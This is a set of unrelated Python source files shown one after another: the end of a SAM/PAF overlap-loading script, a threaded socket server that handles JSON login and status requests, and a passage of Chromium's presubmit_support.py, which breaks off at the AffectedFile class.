load_paf(overlaps_file)
elif (mode == 'load_sam'):
if (len(sys.argv) != 3):
sys.stderr.write('Load SAM file with overlaps.\n')
sys.stderr.write('Usage:\n')
sys.stderr.write('%s %s <overlaps SAM>\n' % (sys.argv[0], sys.argv[1]))
sys.stderr.write('\n')
exit(1)
overlaps_file = sys.argv[2]
load_sam(overlaps_file)
else:
print 'Invalid mode!'
|
server.py
|
import socket
import select
import threading
import json
import sys
import os
from processLayer import ProcessLayer
class Server:
def __init__(self, host = '', port = 5000, pending_conn = 5, blocking = True):
        self.SERVER_IS_ALIVE = True #Control flag
        self.host = host #'' makes the server reachable on any address of the local machine
        self.port = port #Port the process uses to listen for messages
        self.blocking = blocking #Defines whether the socket is blocking or non-blocking
        self.inputs = [sys.stdin]
        self.connections = {} #Stores the connection history
        self.workers = [] #Stores the created threads.
        self.pending_conn = pending_conn #Number of pending connections the server allows
        self.processLayer = ProcessLayer() #Initializes the class responsible for the processing layer
        self.processLayer.readUsers() #Reads the user data
self.start()
def start(self):
"""
        Creates the server socket and gets it ready to accept client connections.
"""
        self.sock = socket.socket() #Creates a socket for communication
        self.sock.bind((self.host, self.port)) #Binds the interface and port used for communication
        self.sock.listen(self.pending_conn) #Puts the process in listening mode. The argument sets the maximum number of pending connections
        self.sock.setblocking(self.blocking) #Sets the socket blocking mode (non-blocking when self.blocking is False)
        self.inputs.append(self.sock) #Adds the main socket to the list of inputs of interest
def acceptConnection(self):
"""
        Method responsible for accepting new connections from clients.
        :return: the new socket and the (ip, port) tuple
"""
        newSock, ipAddress = self.sock.accept() #Accepts the first connection in the queue and returns a new socket and the address of the connected peer.
        print('Connected to:', ipAddress, '\n')
return newSock, ipAddress
def handleRequest(self, clientSock, ipAddress):
"""
        Handles the request made by the client, returning the result of processing the command it requested.
        :param clientSock: socket associated with this client.
        :param ipAddress: IP address and port of this client.
        :return: response message with the result of processing the command.
"""
while True:
            request_msg = clientSock.recv(1024) #Receives the message from the client
            print(f'Message received from {ipAddress}!')
if(request_msg == b''):
break
            #Turns the received message into a dictionary
request = json.loads(request_msg)
if(request['method'] == 'logout'):
response = self.processLayer.logoutClient(request['data']['userName'], request['data']['password'])
elif(request['method'] == 'createAccount'):
response = self.processLayer.createClientAccount(request['data']['userName'], request['data']['password'])
elif(request['method'] == 'deleteAccount'):
response = self.processLayer.deleteClientAccount(request['data']['userName'], request['data']['password'])
elif(request['method'] == 'authAccount'):
response = self.processLayer.authClientAccount(request['data']['userName'], request['data']['password'], (ipAddress[0], request['data']['port']))
elif(request['method'] == 'getMyStatus'):
response = self.processLayer.getClientStatus(request['data']['userName'], request['data']['password'])
elif(request['method'] == 'setMyStatus'):
response = self.processLayer.setClientStatus(request['data']['userName'], request['data']['password'], request['data']['status'])
elif(request['method'] == 'getUsers'):
response = self.processLayer.getUsersList()
else:
response = self.processLayer.methodNotFound(request['method'])
            response_msg = json.dumps(response, ensure_ascii=False) #Builds the JSON response to send to the client
            clientSock.send(bytes(response_msg, encoding='utf-8')) #Sends the response message to the client
            print(f'Response sent back to {ipAddress}!\n')
def stop(self):
"""
        Method responsible for shutting the server down.
"""
self.processLayer.saveUsers()
self.sock.close()
self.SERVER_IS_ALIVE = False
for item in self.connections:
item.close()
        print('Server finished!')
sys.exit(1)
def run(self):
"""
        Method responsible for receiving new connections and handling special commands from the server administrator.
"""
        print('Starting the server...')
        print('Server is ready to accept connections.')
while (self.SERVER_IS_ALIVE) :
try:
                #Waits for any input of interest
read, write, exception = select.select(self.inputs, [], [])
for trigger in read:
                    if trigger == self.sock: #If the trigger is a new connection
clientSock, ipAddress = self.acceptConnection()
                        self.connections[clientSock] = ipAddress #Stores the new connection
worker = threading.Thread(target=self.handleRequest, args=(clientSock,ipAddress))
worker.start()
self.workers.append(worker)
elif trigger == sys.stdin:
cmd = input().lower()
                        #Gracefully shuts the server down
if (cmd == 'fim'):
if(threading.active_count() - 1 != 0):
                                print('\nThere are open connections with clients.')
                                print('New connections will not be accepted.')
                                print('Waiting for the existing clients to finish...')
                                for c in self.workers: #Waits for all worker threads to finish
                                    c.join()
                                print('All clients have finished using the server.')
self.stop()
                        #Shows the connection history
                        elif (cmd == 'hist'):
                            print('\nConnection history:', list(self.connections.values()))
                        #Shows the number of active client threads
                        elif (cmd == 'ativos'):
                            print(f'\nThere are {threading.active_count() - 1} active clients.')
                        #Shuts the server down abruptly (not gracefully)
elif (cmd == 'kill'):
for key,value in self.processLayer.users.items():
self.processLayer.users[key].setStatus(-1)
self.processLayer.users[key].setIP('')
self.processLayer.users[key].setPort(0)
self.stop()
else:
print("\nComando não existe.")
except Exception as e:
print(e)
self.stop()
if __name__ == '__main__':
server = Server(host = '', port = 5000, pending_conn = 10, blocking = False)
server.run()
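# Minimal client sketch (an assumption for illustration only; the real client
# lives elsewhere in the project):
#   import socket, json
#   s = socket.socket(); s.connect(('localhost', 5000))
#   s.send(json.dumps({'method': 'getUsers', 'data': {}}).encode('utf-8'))
#   print(json.loads(s.recv(1024)))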
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '2.0.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import argparse
import ast # Exposed through the API.
import contextlib
import cpplint
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import multiprocessing
import os # Somewhat exposed through the API.
import random
import re # Exposed through the API.
import signal
import six
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback
import unittest # Exposed through the API.
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners as owners_db
import owners_client
import owners_finder
import presubmit_canned_checks
import rdb_wrapper
import scm
import subprocess2 as subprocess # Exposed through the API.
if sys.version_info.major == 2:
# TODO(1009814): Expose urllib2 only through urllib_request and urllib_error
import urllib2 # Exposed through the API.
import urlparse
import urllib2 as urllib_request
import urllib2 as urllib_error
else:
import urllib.parse as urlparse
import urllib.request as urllib_request
import urllib.error as urllib_error
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
def time_time():
# Use this so that it can be mocked in tests without interfering with python
# system machinery.
return time.time()
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate().
class SigintHandler(object):
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
self.__previous_signal = signal.signal(signal.SIGINT, self.interrupt)
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self, signal_num, frame):
with self.__lock:
self.__on_sigint()
self.__previous_signal(signal_num, frame)
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
return stdout, stderr
sigint_handler = SigintHandler()
class Timer(object):
def __init__(self, timeout, fn):
self.completed = False
self._fn = fn
self._timer = threading.Timer(timeout, self._onTimer) if timeout else None
def __enter__(self):
if self._timer:
self._timer.start()
return self
def __exit__(self, _type, _value, _traceback):
if self._timer:
self._timer.cancel()
def _onTimer(self):
self._fn()
self.completed = True
class ThreadPool(object):
def __init__(self, pool_size=None, timeout=None):
self.timeout = timeout
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def _GetCommand(self, test):
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
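    # For example (illustrative): ['python', 'foo_test.py'] becomes
    # ['vpython3', 'foo_test.py'] when test.python3 is True, and a bare
    # ['foo_test.py'] is prefixed with the chosen vpython binary.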
    # On Windows, scripts in the current directory take precedence over PATH, so
# that when testing depot_tools on Windows, calling `vpython.bat` will
# execute the copy of vpython of the depot_tools under test instead of the
# one in the bot.
# As a workaround, we run the tests from the parent directory instead.
if (cmd[0] == vpython and
'cwd' in test.kwargs and
os.path.basename(test.kwargs['cwd']) == 'depot_tools'):
test.kwargs['cwd'] = os.path.dirname(test.kwargs['cwd'])
cmd[1] = os.path.join('depot_tools', cmd[1])
return cmd
def _RunWithTimeout(self, cmd, stdin, kwargs):
p = subprocess.Popen(cmd, **kwargs)
with Timer(self.timeout, p.terminate) as timer:
stdout, _ = sigint_handler.wait(p, stdin)
stdout = stdout.decode('utf-8', 'ignore')
if timer.completed:
stdout = 'Process timed out after %ss\n%s' % (self.timeout, stdout)
return p.returncode, stdout
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of 'python'
to vpython invocations.
"""
cmd = self._GetCommand(test)
try:
start = time_time()
returncode, stdout = self._RunWithTimeout(cmd, test.stdin, test.kwargs)
duration = time_time() - start
except Exception:
duration = time_time() - start
return test.message(
'%s\n%s exec failure (%4.2fs)\n%s' % (
test.name, ' '.join(cmd), duration, traceback.format_exc()))
if returncode != 0:
return test.message(
'%s\n%s (%4.2fs) failed\n%s' % (
test.name, ' '.join(cmd), duration, stdout))
if test.info:
return test.info('%s\n%s (%4.2fs)' % (test.name, ' '.join(cmd), duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
def prompt_should_continue(prompt_string):
sys.stdout.write(prompt_string)
sys.stdout.flush()
response = sys.stdin.readline().strip().lower()
return response in ('y', 'yes')
def _ShouldRunPresubmit(script_text, use_python3):
"""Try to figure out whether these presubmit checks should be run under
python2 or python3. We need to do this without actually trying to
compile the text, since the text might compile in one but not the
other.
Args:
script_text: The text of the presubmit script.
use_python3: if true, will use python3 instead of python2 by default
if USE_PYTHON3 is not specified.
Return:
    True if the presubmit checks should be executed by the currently running Python version.
"""
m = re.search('^USE_PYTHON3 = (True|False)$', script_text, flags=re.MULTILINE)
if m:
use_python3 = m.group(1) == 'True'
return ((sys.version_info.major == 2) and not use_python3) or \
((sys.version_info.major == 3) and use_python3)
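# For example, a presubmit script containing the line "USE_PYTHON3 = True" is
# only run when this script itself executes under Python 3; without such a
# marker line, the |use_python3| default decides.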
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = _PresubmitResult._ensure_str(long_text.rstrip())
@staticmethod
def _ensure_str(val):
"""
val: A "stringish" value. Can be any of str, unicode or bytes.
returns: A str after applying encoding/decoding as needed.
Assumes/uses UTF-8 for relevant inputs/outputs.
We'd prefer to use six.ensure_str but our copy of six is old :(
"""
if isinstance(val, str):
return val
if six.PY2 and isinstance(val, unicode):
return val.encode()
if six.PY3 and isinstance(val, bytes):
return val.decode()
raise ValueError("Unknown string type %s" % type(val))
def handle(self):
sys.stdout.write(self._message)
sys.stdout.write('\n')
for index, item in enumerate(self._items):
sys.stdout.write(' ')
# Write separately in case it's unicode.
sys.stdout.write(str(item))
if index < len(self._items) - 1:
sys.stdout.write(' \\')
sys.stdout.write('\n')
if self._long_text:
sys.stdout.write('\n***************\n')
# Write separately in case it's unicode.
sys.stdout.write(self._long_text)
sys.stdout.write('\n***************\n')
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, url=None, project=None, branch=None):
self.host = urlparse.urlparse(url).netloc if url else None
self.project = project
self.branch = branch
self.cache = {}
self.code_owners_enabled = None
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
    However, the API isn't very clear about what's inside, so see the tests for an example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
    # info is a reference to the cache. We'll modify it here, adding the
    # description to the right patchset if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].items():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def _GetApproversForLabel(self, issue, label):
change_info = self.GetChangeInfo(issue)
label_info = change_info.get('labels', {}).get(label, {})
values = label_info.get('values', {}).keys()
if not values:
return []
max_value = max(int(v) for v in values)
return [v for v in label_info.get('all', [])
if v.get('value', 0) == max_value]
def IsBotCommitApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Bot-Commit'))
def IsOwnersOverrideApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Owners-Override'))
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
reviewers = self._GetApproversForLabel(issue, 'Code-Review')
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
def UpdateDescription(self, description, issue):
gerrit_util.SetCommitMessage(self.host, issue, description, notify='NONE')
def IsCodeOwnersEnabledOnRepo(self):
if self.code_owners_enabled is None:
self.code_owners_enabled = gerrit_util.IsCodeOwnersEnabledOnRepo(
self.host, self.project)
return self.code_owners_enabled
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r'(^|.*?[\\\/])[^.]+$' to the allow list.
# Note that ALL CAPS files are skipped in DEFAULT_FILES_TO_SKIP below.
DEFAULT_FILES_TO_CHECK = (
# C++ and friends
r'.+\.c$', r'.+\.cc$', r'.+\.cpp$', r'.+\.h$', r'.+\.m$', r'.+\.mm$',
r'.+\.inl$', r'.+\.asm$', r'.+\.hxx$', r'.+\.hpp$', r'.+\.s$', r'.+\.S$',
# Scripts
r'.+\.js$', r'.+\.py$', r'.+\.sh$', r'.+\.rb$', r'.+\.pl$', r'.+\.pm$',
# Other
r'.+\.java$', r'.+\.mk$', r'.+\.am$', r'.+\.css$', r'.+\.mojom$',
r'.+\.fidl$'
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_FILES_TO_SKIP = (
r'testing_support[\\\/]google_appengine[\\\/].*',
r'.*\bexperimental[\\\/].*',
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r'.*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*',
# Output directories (just in case)
r'.*\bDebug[\\\/].*',
r'.*\bRelease[\\\/].*',
r'.*\bxcodebuild[\\\/].*',
r'.*\bout[\\\/].*',
# All caps files like README and LICENCE.
r'.*\b[A-Z0-9_]{2,}$',
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r'(|.*[\\\/])\.git[\\\/].*',
r'(|.*[\\\/])\.svn[\\\/].*',
# There is no point in processing a patch file.
r'.+\.diff$',
r'.+\.patch$',
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cpplint = cpplint
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
    # TODO(yyanagisawa): stop exposing this when python3 becomes the default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.re = re
self.subprocess = subprocess
self.sys = sys
self.tempfile = tempfile
self.time = time
self.unittest = unittest
if sys.version_info.major == 2:
self.urllib2 = urllib2
self.urllib_request = urllib_request
self.urllib_error = urllib_error
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'vpython' in order to allow scripts in other
# repos (e.g. src.git) to automatically pick up that repo's .vpython file,
# instead of inheriting the one in depot_tools.
self.python_executable = 'vpython'
# Offer a python 3 executable for use during the migration off of python 2.
self.python3_executable = 'vpython3'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
self.owners_client = None
if self.gerrit:
self.owners_client = owners_client.GetCodeOwnersClient(
root=change.RepositoryRoot(),
upstream=change.UpstreamBranch(),
host=self.gerrit.host,
project=self.gerrit.project,
branch=self.gerrit.branch)
self.owners_db = owners_db.Database(
change.RepositoryRoot(), fopen=open, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with 'base/containers/hash_tables.h' instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def SetTimeout(self, timeout):
self.thread_pool.timeout = timeout
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
    presubmit script. For example, it can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof. Note that files are listed using the OS
path separator, so backslashes are used as separators on Windows.
"""
dir_with_slash = normpath('%s/' % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return list(filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter)))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug('LocalPaths: %s', paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self,
affected_file,
files_to_check=None,
files_to_skip=None,
allow_list=None,
block_list=None):
"""Filters out files that aren't considered 'source file'.
If files_to_check or files_to_skip is None, InputApi.DEFAULT_FILES_TO_CHECK
and InputApi.DEFAULT_FILES_TO_SKIP is used respectively.
    The lists will be compiled as regular expressions and
    AffectedFile.LocalPath() needs to pass both lists.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
if files_to_check is None:
files_to_check = self.DEFAULT_FILES_TO_CHECK
if files_to_skip is None:
files_to_skip = self.DEFAULT_FILES_TO_SKIP
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, files_to_check) and
not Find(affected_file, files_to_skip))
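  # A hedged example of the lambda-based customization mentioned above (the
  # pattern is illustrative): restrict a check to Python files with
  #   input_api.AffectedSourceFiles(
  #       lambda f: input_api.FilterSourceFile(f, files_to_check=[r'.+\.py$']))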
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in 'new' version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
    Note: The line endings (LF or CRLF) are stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
      # Compute a single diff for all files and parse the output; with git
      # this should be much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
# SCM didn't have any diff on this file. It could be that the file was not
# modified at all (e.g. user used --all flag in git cl presubmit).
      # Instead of failing, return an empty string.
# See: https://crbug.com/808346.
logging.warning('No diff found for %s' % path)
return ''
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
